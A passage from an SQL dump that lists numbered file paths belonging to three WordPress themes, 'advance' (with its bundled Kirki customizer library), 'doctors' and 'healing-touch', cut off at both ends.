tent-none.php'),(1780,'wp-content/themes/advance/content-single.php'),(1781,'wp-content/themes/advance/content.php'),(1782,'wp-content/themes/advance/footer/part-footer1.php'),(1783,'wp-content/themes/advance/footer.php'),(1784,'wp-content/themes/advance/front-page.php'),(1785,'wp-content/themes/advance/functions.php'),(1786,'wp-content/themes/advance/header.php'),(1787,'wp-content/themes/advance/headers/part-head1.php'),(1788,'wp-content/themes/advance/headers/part-headsingle.php'),(1789,'wp-content/themes/advance/inc/admin/welcome-screen/sections/getting-started.php'),(1790,'wp-content/themes/advance/inc/admin/welcome-screen/welcome-screen.php'),(1791,'wp-content/themes/advance/inc/customizer/config.php'),(1792,'wp-content/themes/advance/inc/customizer/fields.php'),(1793,'wp-content/themes/advance/inc/customizer/panels.php'),(1794,'wp-content/themes/advance/inc/customizer/sections.php'),(1795,'wp-content/themes/advance/inc/customizer.php'),(1796,'wp-content/themes/advance/inc/kirki/Gruntfile.js'),(1797,'wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css-colors.php'),(1798,'wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css-width.php'),(1799,'wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css.php'),(1800,'wp-content/themes/advance/inc/kirki/assets/images/kirki-bottom.svg'),(1801,'wp-content/themes/advance/inc/kirki/assets/images/kirki-logo.svg'),(1802,'wp-content/themes/advance/inc/kirki/assets/js/branding.js'),(1803,'wp-content/themes/advance/inc/kirki/assets/js/controls/checkbox.js'),(1804,'wp-content/themes/advance/inc/kirki/assets/js/controls/code.js'),(1805,'wp-content/themes/advance/inc/kirki/assets/js/controls/color-palette.js'),(1806,'wp-content/themes/advance/inc/kirki/assets/js/controls/color.js'),(1807,'wp-content/themes/advance/inc/kirki/assets/js/controls/custom.js'),(1808,'wp-content/themes/advance/inc/kirki/assets/js/controls/dashicons.js'),(1809,'wp-content/themes/advance/inc/kirki/assets/js/controls/date.js'),(1810,'wp-content/themes/advance/inc/kirki/assets/js/controls/dimension.js'),(1811,'wp-content/themes/advance/inc/kirki/assets/js/controls/dropdown-pages.js'),(1812,'wp-content/themes/advance/inc/kirki/assets/js/controls/editor.js'),(1813,'wp-content/themes/advance/inc/kirki/assets/js/controls/generic.js'),(1814,'wp-content/themes/advance/inc/kirki/assets/js/controls/multicheck.js'),(1815,'wp-content/themes/advance/inc/kirki/assets/js/controls/multicolor.js'),(1816,'wp-content/themes/advance/inc/kirki/assets/js/controls/number.js'),(1817,'wp-content/themes/advance/inc/kirki/assets/js/controls/palette.js'),(1818,'wp-content/themes/advance/inc/kirki/assets/js/controls/preset.js'),(1819,'wp-content/themes/advance/inc/kirki/assets/js/controls/radio-buttonset.js'),(1820,'wp-content/themes/advance/inc/kirki/assets/js/controls/radio-image.js'),(1821,'wp-content/themes/advance/inc/kirki/assets/js/controls/radio.js'),(1822,'wp-content/themes/advance/inc/kirki/assets/js/controls/repeater.js'),(1823,'wp-content/themes/advance/inc/kirki/assets/js/controls/select.js'),(1824,'wp-content/themes/advance/inc/kirki/assets/js/controls/slider.js'),(1825,'wp-content/themes/advance/inc/kirki/assets/js/controls/sortable.js'),(1826,'wp-content/themes/advance/inc/kirki/assets/js/controls/spacing.js'),(1827,'wp-content/themes/advance/inc/kirki/assets/js/controls/switch.js'),(1828,'wp-content/themes/advance/inc/kirki/assets/js/controls/toggle.js'),(1829,'wp-content/themes/advance/inc/kirki/assets/js/controls/typography.js'),(1830,'wp-content/themes/advance/inc/kirki/assets/js/functions/set-setting-value.js'),(1831,'wp-content/themes/advance/inc/kirki/assets/js/functions/validate-css-value.js'),(1832,'wp-content/themes/advance/inc/kirki/assets/js/l10n.js'),(1833,'wp-content/themes/advance/inc/kirki/assets/js/postmessage.js'),(1834,'wp-content/themes/advance/inc/kirki/assets/js/reset.js'),(1835,'wp-content/themes/advance/inc/kirki/assets/js/tooltip.js'),(1836,'wp-content/themes/advance/inc/kirki/assets/js/vendor/selectize.js'),(1837,'wp-content/themes/advance/inc/kirki/assets/js/vendor/serialize.js'),(1838,'wp-content/themes/advance/inc/kirki/assets/js/vendor/tinymce.plugin.code.js'),(1839,'wp-content/themes/advance/inc/kirki/assets/js/vendor/wp-color-picker-alpha.js'),(1840,'wp-content/themes/advance/inc/kirki/autoloader.php'),(1841,'wp-content/themes/advance/inc/kirki/includes/class-kirki-active-callback.php'),(1842,'wp-content/themes/advance/inc/kirki/includes/class-kirki-config.php'),(1843,'wp-content/themes/advance/inc/kirki/includes/class-kirki-control.php'),(1844,'wp-content/themes/advance/inc/kirki/includes/class-kirki-customize-control.php'),(1845,'wp-content/themes/advance/inc/kirki/includes/class-kirki-enqueue.php'),(1846,'wp-content/themes/advance/inc/kirki/includes/class-kirki-explode-background-field.php'),(1847,'wp-content/themes/advance/inc/kirki/includes/class-kirki-field.php'),(1848,'wp-content/themes/advance/inc/kirki/includes/class-kirki-fonts-google.php'),(1849,'wp-content/themes/advance/inc/kirki/includes/class-kirki-fonts.php'),(1850,'wp-content/themes/advance/inc/kirki/includes/class-kirki-helper.php'),(1851,'wp-content/themes/advance/inc/kirki/includes/class-kirki-init.php'),(1852,'wp-content/themes/advance/inc/kirki/includes/class-kirki-l10n.php'),(1853,'wp-content/themes/advance/inc/kirki/includes/class-kirki-panel.php'),(1854,'wp-content/themes/advance/inc/kirki/includes/class-kirki-sanitize-values.php'),(1855,'wp-content/themes/advance/inc/kirki/includes/class-kirki-scripts-registry.php'),(1856,'wp-content/themes/advance/inc/kirki/includes/class-kirki-section.php'),(1857,'wp-content/themes/advance/inc/kirki/includes/class-kirki-selective-refresh.php'),(1858,'wp-content/themes/advance/inc/kirki/includes/class-kirki-settings.php'),(1859,'wp-content/themes/advance/inc/kirki/includes/class-kirki-toolkit.php'),(1860,'wp-content/themes/advance/inc/kirki/includes/class-kirki-values.php'),(1861,'wp-content/themes/advance/inc/kirki/includes/class-kirki.php'),(1862,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php'),(1863,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-code-control.php'),(1864,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-color-control.php'),(1865,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-color-palette-control.php'),(1866,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dashicons-control.php'),(1867,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-date-control.php'),(1868,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dimension-control.php'),(1869,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dropdown-pages-control.php'),(1870,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-editor-control.php'),(1871,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-generic-control.php'),(1872,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-multicheck-control.php'),(1873,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-multicolor-control.php'),(1874,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-number-control.php'),(1875,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-palette-control.php'),(1876,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-preset-control.php'),(1877,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-buttonset-control.php'),(1878,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-control.php'),(1879,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-radio-image-control.php'),(1880,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php'),(1881,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-select-control.php'),(1882,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-slider-control.php'),(1883,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php'),(1884,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-spacing-control.php'),(1885,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-switch-control.php'),(1886,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-toggle-control.php'),(1887,'wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-typography-control.php'),(1888,'wp-content/themes/advance/inc/kirki/includes/deprecated.php'),(1889,'wp-content/themes/advance/inc/kirki/includes/dynamic-css.php'),(1890,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-checkbox.php'),(1891,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-code.php'),(1892,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color-alpha.php'),(1893,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color-palette.php'),(1894,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-color.php'),(1895,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-custom.php'),(1896,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dashicons.php'),(1897,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-date.php'),(1898,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dimension.php'),(1899,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-dropdown-pages.php'),(1900,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-editor.php'),(1901,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-generic.php'),(1902,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-group-title.php'),(1903,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-image.php'),(1904,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-kirki-generic.php'),(1905,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-multicheck.php'),(1906,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-multicolor.php'),(1907,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-number.php'),(1908,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-palette.php'),(1909,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-preset.php'),(1910,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-radio-buttonset.php'),(1911,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-radio-image.php'),(1912,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-radio.php'),(1913,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select.php'),(1914,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select2-multiple.php'),(1915,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-select2.php'),(1916,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-slider.php'),(1917,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-sortable.php'),(1918,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-spacing.php'),(1919,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-switch.php'),(1920,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-text.php'),(1921,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-textarea.php'),(1922,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-toggle.php'),(1923,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-typography.php'),(1924,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-upload.php'),(1925,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-filed-link.php'),(1926,'wp-content/themes/advance/inc/kirki/includes/field/class-kirki-filed-url.php'),(1927,'wp-content/themes/advance/inc/kirki/includes/lib/class-aricolor.php'),(1928,'wp-content/themes/advance/inc/kirki/includes/lib/class-kirki-color.php'),(1929,'wp-content/themes/advance/inc/kirki/includes/output/class-kirki-output.php'),(1930,'wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-multicolor.php'),(1931,'wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-spacing.php'),(1932,'wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-typography.php'),(1933,'wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-background-image.php'),(1934,'wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-background-position.php'),(1935,'wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property-font-family.php'),(1936,'wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property.php'),(1937,'wp-content/themes/advance/inc/kirki/includes/panels/class-kirki-panels-default-panel.php'),(1938,'wp-content/themes/advance/inc/kirki/includes/panels/class-kirki-panels-expanded-panel.php'),(1939,'wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-icons.php'),(1940,'wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-loading.php'),(1941,'wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-tooltips.php'),(1942,'wp-content/themes/doctors/404.php'),(1943,'wp-content/themes/doctors/Readme.txt'),(1944,'wp-content/themes/doctors/app/assets/css/style.css'),(1945,'wp-content/themes/doctors/app/includes/getver-n.php'),(1946,'wp-content/themes/doctors/attachment.php'),(1947,'wp-content/themes/doctors/author.php'),(1948,'wp-content/themes/doctors/category.php'),(1949,'wp-content/themes/doctors/changelog.txt'),(1950,'wp-content/themes/doctors/comments.php'),(1951,'wp-content/themes/doctors/core/assets/css/font-awesome.css'),(1952,'wp-content/themes/doctors/core/assets/css/font-awesome.min.css'),(1953,'wp-content/themes/doctors/core/assets/css/owl.carousel.css'),(1954,'wp-content/themes/doctors/core/assets/css/style.css'),(1955,'wp-content/themes/doctors/core/assets/css/swipebox.css'),(1956,'wp-content/themes/doctors/core/assets/css/swipebox.min.css'),(1957,'wp-content/themes/doctors/core/assets/css/theme-base-css.php'),(1958,'wp-content/themes/doctors/core/assets/css/theme-customize-css.php'),(1959,'wp-content/themes/doctors/core/assets/images/swipebox/icons.png'),(1960,'wp-content/themes/doctors/core/assets/images/swipebox/icons.svg'),(1961,'wp-content/themes/doctors/core/assets/images/swipebox/loader.gif'),(1962,'wp-content/themes/doctors/core/assets/js/jquery.flexslider-min.js'),(1963,'wp-content/themes/doctors/core/assets/js/jquery.flexslider.js'),(1964,'wp-content/themes/doctors/core/assets/js/jquery.swipebox.js'),(1965,'wp-content/themes/doctors/core/assets/js/jquery.swipebox.min.js'),(1966,'wp-content/themes/doctors/core/assets/js/owl.carousel.js'),(1967,'wp-content/themes/doctors/core/assets/js/owl.carousel.min.js'),(1968,'wp-content/themes/doctors/core/assets/js/theme-base-js.php'),(1969,'wp-content/themes/doctors/core/assets/js/theme-customize-js.php'),(1970,'wp-content/themes/doctors/core/assets/js/theme.js'),(1971,'wp-content/themes/doctors/core/contents/loop_404/404.php'),(1972,'wp-content/themes/doctors/core/contents/loop_404/skin1/css.php'),(1973,'wp-content/themes/doctors/core/contents/loop_404/skin1/html.php'),(1974,'wp-content/themes/doctors/core/contents/loop_attachment/attachment.php'),(1975,'wp-content/themes/doctors/core/contents/loop_attachment/loop_attachment/index.php'),(1976,'wp-content/themes/doctors/core/contents/loop_attachment/skin1/css.php'),(1977,'wp-content/themes/doctors/core/contents/loop_attachment/skin1/html.php'),(1978,'wp-content/themes/doctors/core/contents/loop_author/author.php'),(1979,'wp-content/themes/doctors/core/contents/loop_author/loop_author/index.php'),(1980,'wp-content/themes/doctors/core/contents/loop_author/skin1/c-css.php'),(1981,'wp-content/themes/doctors/core/contents/loop_author/skin1/css.php'),(1982,'wp-content/themes/doctors/core/contents/loop_author/skin1/html.php'),(1983,'wp-content/themes/doctors/core/contents/loop_category/category.php'),(1984,'wp-content/themes/doctors/core/contents/loop_category/skin1/html.php'),(1985,'wp-content/themes/doctors/core/contents/loop_comments/comments.php'),(1986,'wp-content/themes/doctors/core/contents/loop_comments/skin1/css.php'),(1987,'wp-content/themes/doctors/core/contents/loop_comments/skin1/html.php'),(1988,'wp-content/themes/doctors/core/contents/loop_frontPage/frontPage.php'),(1989,'wp-content/themes/doctors/core/contents/loop_frontPage/skin1/html.php'),(1990,'wp-content/themes/doctors/core/contents/loop_home/home.php'),(1991,'wp-content/themes/doctors/core/contents/loop_home/skin1/html.php'),(1992,'wp-content/themes/doctors/core/contents/loop_page/page.php'),(1993,'wp-content/themes/doctors/core/contents/loop_page/skin1/html.php'),(1994,'wp-content/themes/doctors/core/contents/loop_post/post.php'),(1995,'wp-content/themes/doctors/core/contents/loop_post/skin1/c-css.php'),(1996,'wp-content/themes/doctors/core/contents/loop_post/skin1/css.php'),(1997,'wp-content/themes/doctors/core/contents/loop_post/skin1/html.php'),(1998,'wp-content/themes/doctors/core/contents/loop_search/search.php'),(1999,'wp-content/themes/doctors/core/contents/loop_search/skin1/html.php'),(2000,'wp-content/themes/doctors/core/contents/loop_single/single.php'),(2001,'wp-content/themes/doctors/core/contents/loop_single/skin1/c-css.php'),(2002,'wp-content/themes/doctors/core/contents/loop_single/skin1/css.php'),(2003,'wp-content/themes/doctors/core/contents/loop_single/skin1/html.php'),(2004,'wp-content/themes/doctors/core/contents/loop_tag/skin1/html.php'),(2005,'wp-content/themes/doctors/core/contents/loop_tag/tag.php'),(2006,'wp-content/themes/doctors/core/contents/loop_templateAbout/skin1/css.php'),(2007,'wp-content/themes/doctors/core/contents/loop_templateAbout/skin1/html.php'),(2008,'wp-content/themes/doctors/core/contents/loop_templateAbout/skin1/js.php'),(2009,'wp-content/themes/doctors/core/contents/loop_templateAbout/templateAbout.php'),(2010,'wp-content/themes/doctors/core/contents/loop_templateContact/skin1/css.php'),(2011,'wp-content/themes/doctors/core/contents/loop_templateContact/skin1/html.php'),(2012,'wp-content/themes/doctors/core/contents/loop_templateContact/skin1/js.php'),(2013,'wp-content/themes/doctors/core/contents/loop_templateContact/templateContact.php'),(2014,'wp-content/themes/doctors/core/contents/loop_templateSitemap/skin1/css.php'),(2015,'wp-content/themes/doctors/core/contents/loop_templateSitemap/skin1/html.php'),(2016,'wp-content/themes/doctors/core/contents/loop_templateSitemap/skin1/js.php'),(2017,'wp-content/themes/doctors/core/contents/loop_templateSitemap/templateSitemap.php'),(2018,'wp-content/themes/doctors/core/contents/part_footer/footer.php'),(2019,'wp-content/themes/doctors/core/contents/part_footer/part_footer/index.php'),(2020,'wp-content/themes/doctors/core/contents/part_footer/skin1/css.php'),(2021,'wp-content/themes/doctors/core/contents/part_footer/skin1/html.php'),(2022,'wp-content/themes/doctors/core/contents/part_footer/skin2/css.php'),(2023,'wp-content/themes/doctors/core/contents/part_footer/skin2/html.php'),(2024,'wp-content/themes/doctors/core/contents/part_footerWidgets/footerWidgets.php'),(2025,'wp-content/themes/doctors/core/contents/part_footerWidgets/skin1/css.php'),(2026,'wp-content/themes/doctors/core/contents/part_footerWidgets/skin1/html.php'),(2027,'wp-content/themes/doctors/core/contents/part_header/header.php'),(2028,'wp-content/themes/doctors/core/contents/part_header/skin1/c-css.php'),(2029,'wp-content/themes/doctors/core/contents/part_header/skin1/css.php'),(2030,'wp-content/themes/doctors/core/contents/part_header/skin1/customizer.php'),(2031,'wp-content/themes/doctors/core/contents/part_header/skin1/html.php'),(2032,'wp-content/themes/doctors/core/contents/part_sidebar/sidebar.php'),(2033,'wp-content/themes/doctors/core/contents/part_sidebar/skin1/html.php'),(2034,'wp-content/themes/doctors/core/contents/part_subHeader/skin1/c-css.php'),(2035,'wp-content/themes/doctors/core/contents/part_subHeader/skin1/css.php'),(2036,'wp-content/themes/doctors/core/contents/part_subHeader/skin1/html.php'),(2037,'wp-content/themes/doctors/core/contents/part_subHeader/subHeader.php'),(2038,'wp-content/themes/doctors/core/core.php'),(2039,'wp-content/themes/doctors/core/customizer/color.php'),(2040,'wp-content/themes/doctors/core/customizer/customizer-controls.js'),(2041,'wp-content/themes/doctors/core/customizer/customizer.php'),(2042,'wp-content/themes/doctors/core/customizer/font.php'),(2043,'wp-content/themes/doctors/core/customizer/general.php'),(2044,'wp-content/themes/doctors/core/customizer/header-footer.php'),(2045,'wp-content/themes/doctors/core/customizer/help/_background_color.php'),(2046,'wp-content/themes/doctors/core/customizer/help/_background_color_alt.php'),(2047,'wp-content/themes/doctors/core/customizer/help/_background_image.php'),(2048,'wp-content/themes/doctors/core/customizer/help/_border_color.php'),(2049,'wp-content/themes/doctors/core/customizer/help/_border_color_alt.php'),(2050,'wp-content/themes/doctors/core/customizer/help/_border_color_meta.php'),(2051,'wp-content/themes/doctors/core/customizer/help/_social-icons-color.php'),(2052,'wp-content/themes/doctors/core/customizer/help/_social-icons.php'),(2053,'wp-content/themes/doctors/core/customizer/help/_text_color.php'),(2054,'wp-content/themes/doctors/core/customizer/help/_text_color_alt.php'),(2055,'wp-content/themes/doctors/core/customizer/help/_text_color_meta.php'),(2056,'wp-content/themes/doctors/core/customizer/help/custom_control_checkbox.php'),(2057,'wp-content/themes/doctors/core/customizer/help/custom_control_color.php'),(2058,'wp-content/themes/doctors/core/customizer/help/custom_control_heading.php'),(2059,'wp-content/themes/doctors/core/customizer/help/custom_control_image.php'),(2060,'wp-content/themes/doctors/core/customizer/help/custom_control_select.php'),(2061,'wp-content/themes/doctors/core/customizer/help/custom_control_text.php'),(2062,'wp-content/themes/doctors/core/customizer/help/custom_control_textarea.php'),(2063,'wp-content/themes/doctors/core/customizer/help/help_function.php'),(2064,'wp-content/themes/doctors/core/home/blocks/blog_grid/skin1/c-css.php'),(2065,'wp-content/themes/doctors/core/home/blocks/blog_grid/skin1/css.php'),(2066,'wp-content/themes/doctors/core/home/blocks/blog_grid/skin1/customizer.php'),(2067,'wp-content/themes/doctors/core/home/blocks/blog_grid/skin1/html.php'),(2068,'wp-content/themes/doctors/core/home/blocks/info_box/skin1/c-css.php'),(2069,'wp-content/themes/doctors/core/home/blocks/info_box/skin1/css.php'),(2070,'wp-content/themes/doctors/core/home/blocks/info_box/skin1/customizer.php'),(2071,'wp-content/themes/doctors/core/home/blocks/info_box/skin1/html.php'),(2072,'wp-content/themes/doctors/core/home/blocks/slideshow/skin1/css.php'),(2073,'wp-content/themes/doctors/core/home/blocks/slideshow/skin1/customizer.php'),(2074,'wp-content/themes/doctors/core/home/blocks/slideshow/skin1/html.php'),(2075,'wp-content/themes/doctors/core/home/blocks/testimonial/skin1/c-css.php'),(2076,'wp-content/themes/doctors/core/home/blocks/testimonial/skin1/css.php'),(2077,'wp-content/themes/doctors/core/home/blocks/testimonial/skin1/customizer.php'),(2078,'wp-content/themes/doctors/core/home/blocks/testimonial/skin1/html.php'),(2079,'wp-content/themes/doctors/core/home/blocks/text/skin1/c-css.php'),(2080,'wp-content/themes/doctors/core/home/blocks/text/skin1/css.php'),(2081,'wp-content/themes/doctors/core/home/blocks/text/skin1/customizer.php'),(2082,'wp-content/themes/doctors/core/home/blocks/text/skin1/html.php'),(2083,'wp-content/themes/doctors/core/home/home-content-builder.php'),(2084,'wp-content/themes/doctors/core/home/home-css-builder.php'),(2085,'wp-content/themes/doctors/core/home/home-customizer-builder.php'),(2086,'wp-content/themes/doctors/core/home/home-data.php'),(2087,'wp-content/themes/doctors/core/home/home-js-builder.php'),(2088,'wp-content/themes/doctors/core/includes/additional-script-loader.php'),(2089,'wp-content/themes/doctors/core/includes/content-loader.php'),(2090,'wp-content/themes/doctors/core/includes/custom-functions.php'),(2091,'wp-content/themes/doctors/core/includes/customize-loader.php'),(2092,'wp-content/themes/doctors/core/includes/default_mods.php'),(2093,'wp-content/themes/doctors/core/includes/dynamic-custom.css.php'),(2094,'wp-content/themes/doctors/core/includes/dynamic.css.php'),(2095,'wp-content/themes/doctors/core/includes/dynamic.js.php'),(2096,'wp-content/themes/doctors/core/includes/getver.php'),(2097,'wp-content/themes/doctors/core/includes/script-loader.php'),(2098,'wp-content/themes/doctors/core/includes/trunk/ds1/ds1_css.php'),(2099,'wp-content/themes/doctors/core/includes/trunk/ds1/ds1_getver.php'),(2100,'wp-content/themes/doctors/core/includes/trunk/ds1/ds1_home-data.php'),(2101,'wp-content/themes/doctors/core/includes/trunk/ds1/ds1_mods.php'),(2102,'wp-content/themes/doctors/core/includes/trunk/fe2/fe2_css.php'),(2103,'wp-content/themes/doctors/core/includes/trunk/fe2/fe2_getver.php'),(2104,'wp-content/themes/doctors/core/includes/trunk/fe2/fe2_home-data.php'),(2105,'wp-content/themes/doctors/core/includes/trunk/fe2/fe2_mods.php'),(2106,'wp-content/themes/doctors/core/vandors/mr-image-resize.php'),(2107,'wp-content/themes/doctors/editor-style.css'),(2108,'wp-content/themes/doctors/footer.php'),(2109,'wp-content/themes/doctors/functions.php'),(2110,'wp-content/themes/doctors/header.php'),(2111,'wp-content/themes/doctors/images/demo/bg_1.jpg'),(2112,'wp-content/themes/doctors/images/demo/bg_2.jpg'),(2113,'wp-content/themes/doctors/images/demo/bg_3.jpg'),(2114,'wp-content/themes/doctors/images/demo/blog_1.jpg'),(2115,'wp-content/themes/doctors/images/demo/blog_2.jpg'),(2116,'wp-content/themes/doctors/images/demo/blog_3.jpg'),(2117,'wp-content/themes/doctors/images/demo/slider_1.jpg'),(2118,'wp-content/themes/doctors/images/demo/slider_2.jpg'),(2119,'wp-content/themes/doctors/images/demo/slider_3.jpg'),(2120,'wp-content/themes/doctors/images/demo/user_1.jpg'),(2121,'wp-content/themes/doctors/images/demo/user_2.jpg'),(2122,'wp-content/themes/doctors/images/demo/user_3.jpg'),(2123,'wp-content/themes/doctors/images/demo/user_4.jpg'),(2124,'wp-content/themes/doctors/images/logo.png'),(2125,'wp-content/themes/doctors/index.php'),(2126,'wp-content/themes/doctors/license.txt'),(2127,'wp-content/themes/doctors/page.php'),(2128,'wp-content/themes/doctors/rtl.css'),(2129,'wp-content/themes/doctors/screenshot.jpg'),(2130,'wp-content/themes/doctors/search.php'),(2131,'wp-content/themes/doctors/sidebar.php'),(2132,'wp-content/themes/doctors/single.php'),(2133,'wp-content/themes/doctors/style.css'),(2134,'wp-content/themes/doctors/tag.php'),(2135,'wp-content/themes/doctors/template-home.php'),(2136,'wp-content/themes/doctors/template-leftSidebar.php'),(2137,'wp-content/themes/doctors/template-noSidebar.php'),(2138,'wp-content/themes/doctors/template-rightSidebar.php'),(2139,'wp-content/themes/healing-touch/404.php'),(2140,'wp-content/themes/healing-touch/archive.php'),(2141,'wp-content/themes/healing-touch/blog-post.php'),(2142,'wp-content/themes/healing-touch/category.php'),(2143,'wp-content/themes/healing-touch/change_log.txt'),(2144,'wp-content/themes/healing-touch/comments.php'),(2145,'wp-content/themes/healing-touch/content-page.php'),(2146,'wp-content/themes/healing-touch/content-single.php'),(2147,'wp-content/themes/healing-touch/content.php'),(2148,'wp-content/themes/healing-touch/css/ie.css'),(2149,'wp-content/themes/healing-touch/css/main.css'),(2150,'wp-content/themes/healing-touch/css/nivo-slider.css'),(2151,'wp-content/themes/healing-touch/css/style_base.css'),(2152,'wp-content/themes/healing-touch/editor-style.css'),(2153,'wp-content/themes/healing-touch/footer.php'),(2154,'wp-content/themes/healing-touch/front-page.php'),(2155,'wp-content/themes/healing-touch/functions.php'),(2156,'wp-content/themes/healing-touch/header.php'),(2157,'wp-content/themes/healing-touch/image.php'),(2158,'wp-content/themes/healing-touch/images/about-image.png'),(2159,'wp-content/themes/healing-touch/images/arrows.png'),(2160,'wp-content/themes/healing-touch/images/call-icon.png'),(2161,'wp-content/themes/healing-touch/images/favicon.ico'),(2162,'wp-content/themes/healing-touch/images/footer-bullets.png'),(2163,'wp-content/themes/healing-touch/images/footer-heading-border.jpg'),(2164,'wp-content/themes/healing-touch/images/free-vs-pro.png'),(2165,'wp-content/themes/healing-touch/images/hr_double.png'),(2166,'wp-content/themes/healing-touch/images/hr_footer.png'),(2167,'wp-content/themes/healing-touch/images/icon-mail.png'),(2168,'wp-content/themes/healing-touch/images/icon1.png'),(2169,'wp-content/themes/healing-touch/images/icon2.png'),(2170,'wp-content/themes/healing-touch/images/icon3.png'),(2171,'wp-content/themes/healing-touch/images/icon4.png'),(2172,'wp-content/themes/healing-touch/images/img_404.png'),(2173,'wp-content/themes/healing-touch/images/loading.gif'),(2174,'wp-content/themes/healing-touch/images/location-icon.png'),(2175,'wp-content/themes/healing-touch/images/mobile_nav_right.png'),(2176,'wp-content/themes/healing-touch/images/sktskill.jpg'),(2177,'wp-content/themes/healing-touch/images/slides/slider1.jpg'),(2178,'wp-content/themes/healing-touch/images/slides/slider2.jpg'),(2179,'wp-content/themes/healing-touch/images/slides/slider3.jpg'),(2180,'wp-content/themes/healing-touch/images/social/fb-icon.png'),(2181,'wp-content/themes/healing-touch/images/social/gplus.png'),(2182,'wp-content/themes/healing-touch/images/social/linkedin.png'),(2183,'wp-content/themes/healing-touch/images/social/twitt.png'),(2184,'wp-content/themes/healing-touch/images/welcome_doctor.jpg'),(2185,'wp-content/themes/healing-touch/inc/about-themes.php'),(2186,'wp-content/themes/healing-touch/inc/custom-header.php'),(2187,'wp-content/themes/healing-touch/inc/customizer.php'),(2188,'wp-content/themes/healing-touch/inc/extras.php'),(2189,'wp-content/themes/healing-touch/inc/jetpack.php'),(2190,'wp-content/themes/healing-touch/inc/template-tags.php'),(2191,'wp-content/themes/healing-touch/index.php'),(2192,'wp-content/themes/healing-touch/js/custom.customize.js'),(2193,'wp-content/themes/healing-touch/js/custom.js'),(2194,'wp-content/themes/healing-touch/js/customize-preview.js'),(2195,'wp-content/themes/healing-touch/js/jquery.nivo.slider.js'),(2196,'wp-content/themes/healing-touch/license.txt'),(2197,'wp-content/themes/healing-touch/no-results.php'),(2198,'wp-content/themes/healing-touch/page.php'),(2199,'wp-content/themes/healing-touch/readme.txt'),(2200,'wp-content/themes/healing-touch/screenshot.png'),(2201,'wp-content/themes/healing-touch/search.